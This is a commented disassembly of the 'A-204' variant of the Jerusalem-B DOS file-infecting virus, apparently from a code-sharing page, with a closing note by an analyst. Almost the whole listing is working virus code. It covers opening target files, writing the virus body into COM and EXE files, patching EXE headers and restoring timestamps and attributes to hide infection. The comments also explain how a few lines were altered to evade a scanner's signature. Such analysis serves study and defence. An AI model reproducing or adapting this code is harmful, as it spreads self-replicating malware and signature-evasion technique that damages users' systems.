📄 jerub204.asm
字号:
053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename
0540 33 C9 XOR CX,CX ; Get fileattributes
0542 B8 01 43 MOV AX,04301 ; Put File Attributes
0545 CD 21 INT 021 ; (CHMOD)
0547 72 3B JB 0584 ; If Error: -> 0584h
0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with
054E B4 3E MOV AH,03E ; handle BX
0550 CD 21 INT 021 ;
0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ???
0559 B8 02 3D MOV AX,03D02 ; Open File with
055C CD 21 INT 021 ; Handle in READ/WRITE mode
055E 72 24 JB 0584 ; If Error: -> 0584h
0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
0564 8C C8 MOV AX,CS
0566 8E D8 MOV DS,AX
0568 8E C0 MOV ES,AX
056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle
056E B8 00 57 MOV AX,05700 ; Get File' date/time-
0571 CD 21 INT 021 ; stamp
0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer
0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from
057B B8 00 42 MOV AX,04200 ; beginning of file with
057E 33 C9 XOR CX,CX ; CX:DX bytes
0580 8B D1 MOV DX,CX ;
0582 CD 21 INT 021 ;
0584 72 3D JB 05C3 ; If Error: -> 05C3h
0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'?
058B 74 03 JE 0590 ; Yes: -> 0590h
058D EB 57 JMP 05E6 ; JUMP -> 05E6h
058F 90 NOP
0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para-
; graphs BX=1000h For COM-
; files there are 1000h 16d
; bytes paragrahs available
0593 B4 48 MOV AH,048 ;
0595 CD 21 INT 021 ; Allocate Memory
0597 73 0B JAE 05A4 ; If enough memory available
; -> 05A4h
0599 B4 3E MOV AH,03E ; Close a file with
059B 8B 1E 70 00 MOV BX,W[070] ; handle BX
059F CD 21 INT 021 ;
05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h
05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available
; Variable (0001h)
05A8 8E C0 MOV ES,AX ;
05AA 33 F6 XOR SI,SI ; SI=0000h
05AC 8B FE MOV DI,SI ; DI=0000h
05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d)
; length of virus
05B1 F3 A4 REP MOVSB ; Put virus code at begin-
; ning of buffer ES:DI
05B3 8B D7 MOV DX,DI ; DX=DI=0710h
05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File
05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle
05BD 06 PUSH ES ; Read from a file with
05BE 1F POP DS ; handle CX (length
05BF B4 3F MOV AH,03F ; of file) bytes in buffer
05C1 CD 21 INT 021 ; DS:DX
05C3 72 1C JB 05E1 ; If Error: -> 05E1h
05C5 03 F9 ADD DI,CX ; DI=Length of original
; file+0710h (length of
; viruscode)+05h
05C7 33 C9 XOR CX,CX ; CX=0000h
05C9 8B D1 MOV DX,CX ; Move file read/write
05CB B8 00 42 MOV AX,04200 ; pointer with offset from
05CE CD 21 INT 021 ; beginning of file
05D0 BE 05 00 MOV SI,5 ;
05D3 B9 05 00 MOV CX,5 ;
05D6 F3 2E A4 REP CS MOVSB ;
05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of
; original code
05DB 33 D2 XOR DX,DX ; DX=0000h
05DD B4 40 MOV AH,040 ; Write to file with handle
05DF CD 21 INT 021 ; CX bytes
05E1 72 0D JB 05F0 ; If Error: -> 05F0h
05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h
05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from
05E9 BA 4F 00 MOV DX,04F ; file with handle
05EC B4 3F MOV AH,03F ;
05EE CD 21 INT 021 ;
05F0 72 4A JB 063C ; If Error: -> 063Ch
05F2 C7 06 61 00 84 19 MOV W[061],01984 ; Store 1984h=6532d
05F8 A1 5D 00 MOV AX,W[05D] ;
05FB A3 45 00 MOV W[045],AX ;
05FE A1 5F 00 MOV AX,W[05F] ;
0601 A3 43 00 MOV W[043],AX ;
0604 A1 63 00 MOV AX,W[063] ;
0607 A3 47 00 MOV W[047],AX ;
060A A1 65 00 MOV AX,W[065] ;
060D A3 49 00 MOV W[049],AX ;
0610 A1 53 00 MOV AX,W[053] ;
0613 83 3E 51 00 00 CMP W[051],0 ; '0000'?
0618 74 01 JE 061B ; Yes: -> 061Bh
061A 48 DEC AX ; AX=AX-01h
061B F7 26 78 00 MUL W[078] ;
061F 03 06 51 00 ADD AX,W[051] ;
0623 83 D2 00 ADC DX,0 ;
0626 05 0F 00 ADD AX,0F ;
0629 83 D2 00 ADC DX,0 ;
062C 25 F0 FF AND AX,-010 ;
062F A3 7C 00 MOV W[07C],AX ; Store AX
0632 89 16 7E 00 MOV W[07E],DX ; Store DX
0636 05 10 07 ADD AX,0710 ; AX=AX+1808
0639 83 D2 00 ADC DX,0 ;
063C 72 3A JB 0678 ; If Error :-> 0678h
063E F7 36 78 00 DIV W[078] ;
0642 0B D2 OR DX,DX ;
0644 74 01 JE 0647 ;
0646 40 INC AX ; AX=AX+01h
0647 A3 53 00 MOV W[053],AX ;
064A 89 16 51 00 MOV W[051],DX ;
064E A1 7C 00 MOV AX,W[07C] ; Restore AX
0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX
0655 F7 36 7A 00 DIV W[07A] ;
0659 2B 06 57 00 SUB AX,W[057] ;
065D A3 65 00 MOV W[065],AX ;
0660 C7 06 63 00 C5 00 MOV W[063],0C5 ;
0666 A3 5D 00 MOV W[05D],AX ;
0669 C7 06 5F 00 10 07 MOV W[05F],0710 ;
066F 33 C9 XOR CX,CX ; CX=0000h
0671 8B D1 MOV DX,CX ; DX=0000h
0673 B8 00 42 MOV AX,04200 ; Move File Read/Write
0676 CD 21 INT 021 ; pointer to beginning of
; file
0678 72 0A JB 0684 ; If Error: -> 0684h
067A B9 1C 00 MOV CX,01C ; CX=1Ch
067D BA 4F 00 MOV DX,04F ; DX=4Fh
0680 B4 40 MOV AH,040 ; Write to file with
0682 CD 21 INT 021 ; handle
0684 72 11 JB 0697 ; If Error: -> 0697h
0686 3B C1 CMP AX,CX ; Are all bytes written?
0688 75 18 JNE 06A2 ; No: -> 06A2h
068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX
068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX
0692 B8 00 42 MOV AX,04200
0695 CD 21 INT 021
0697 72 09 JB 06A2 ; If Error: -> 06A2h
0699 33 D2 XOR DX,DX ; DX=0000h
069B B9 10 07 MOV CX,0710 ; CX=0710h
069E B4 40 MOV AH,040
06A0 CD 21 INT 021
06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory?
06A8 74 04 JE 06AE ; Yes: -> 06AEh
06AA B4 49 MOV AH,049 ; Free memory
06AC CD 21 INT 021 ;
06AE 2E 83 3E 70 00 FF CS CMP W[070],-1
06B4 74 31 JE 06E7
06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle
06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date
06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time
06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time
06C8 CD 21 INT 021 ; stamp
06CA B4 3E MOV AH,03E ; Close a file with
06CC CD 21 INT 021 ; handle
06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of
; filename
06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes
06D8 B8 01 43 MOV AX,04301 ; Put File Attributes
06DB CD 21 INT 021 ;
06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector
06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h
06E5 CD 21 INT 021 ;
06E7 07 POP ES ; Restore Registers
06E8 1F POP DS
06E9 5F POP DI
06EA 5E POP SI
06EB 5A POP DX
06EC 59 POP CX
06ED 5B POP BX
06EE 58 POP AX
06EF 9D POPF ; Restore Flags
06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h
; address which was intercep-
; ted with the LOAD & EXEC.
; statement. Which means it
; will load and execute the
; selected file
06F5 00 00 00 00 00 00 00 00 00 00 00
0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00
0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h
0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h
07A5 FC CLD
07A6 B4 E0 MOV AH,0E0
07A8 CD 21 INT 021
07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h?
07AD 73 16 JAE 07C5 ; Yes: -> 07C5h
07AF 80 FC 03 CMP AH,3 ; AH<03h
07B2 72 11 JB 07C5 ; Yes: -> 07C5h
; The only way that the
; code get passed here if
; the virus is active in
; memory. It will return
; AX=0300h then.
07B4 B4 DD MOV AH,0DD
07B6 BF 00 01 MOV DI,0100 ; DI=0100h
07B9 BE 10 07 MOV SI,0710 ; SI=0710h
07BC 03 F7 ADD SI,DI ; SI=0810h
07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file
07C3 CD 21 INT 021
07C5 8C C8 MOV AX,CS ; AX=CS
07C7 05 10 00 ADD AX,010 ; AX=AX+10h
07CA 8E D0 MOV SS,AX ; SS=CS+10h
07CC BC 00 07 MOV SP,0700 ; SP=0700h
07CF 50 PUSH AX ; Store AX
07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h
07D3 50 PUSH AX ; Store AX
07D4 CB RETF ; RETURN from FAR
07D5 FC CLD ; Clear Direct
; Here the A-204 variant
; differs from the original
; Jerusalem Version B virus
; for the second time.
07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have
07DB 06 PUSH ES ; been changed in order
; trying to avoid being
; detected by the finger-
; print in the VirScan.Dat
; file. It has not succeeded
; because the strain VirScan
; searches for appears two
; times in the viruscode
07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES
07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES
07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES
07EB 8C C0 MOV AX,ES ; AX=ES
07ED 05 10 00 ADD AX,010 ; AX=AX+10h
07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h
07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h
07FA B4 E0 MOV AH,0E0 ; AH=E0h
07FC CD 21 INT 021 ;
07FE 80 FC E0 CMP AH,0E0 ; AH>=E0?
0801 73 13 JAE 0816 ; Yes: -> 0816h
; This will never happen.
; First of all it would be
; a short jump into the
; original program. Secondly
; is the virus already active
; in memory and will return
; AX=0300h at the INT 21h call
; with AH=E0h
0803 80 FC 03 CMP AH,3 ; AH=03h
0806 07 POP ES ; Restore ES
0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS
080C 2E 8B 26 43 90 CS MOV SP,W[09043] ;
0810 90 NOP ; Start ofOriginal Program
0811 90 NOP
0812 90 NOP
0813 90 NOP
0814 90 NOP
0815 90 NOP
0816 90 NOP
0817 90 NOP
0818 90 NOP
0819 90 NOP
081A 90 NOP
081B 90 NOP
081C 90 NOP
081D 90 NOP
081E 90 NOP
081F 90 NOP
0820 90 NOP
0821 90 NOP
0822 90 NOP
0823 90 NOP
0824 90 NOP
0825 90 NOP
0826 90 NOP
0827 90 NOP
0828 90 NOP
0829 90 NOP
082A 90 NOP
082B 90 NOP
082C 90 NOP
082D 90 NOP
082E 90 NOP
082F C3 RET ; End of Original Program
0830 2D 32 30 34 2A ; -204*
NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur,
in English a Prologue in Hardware and Software) at my university. In this
course the PDP-11 Language is being teached. It's my opion, and my opion only,
that this change has been made by a first year student. The IAP-course is
a course for first years students. Only some lines were changed in order to
avoid detection. If the 'author' did know more about the 8086, (s?)he could
have optimized the code. Some pieces can be done much more elegant.⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -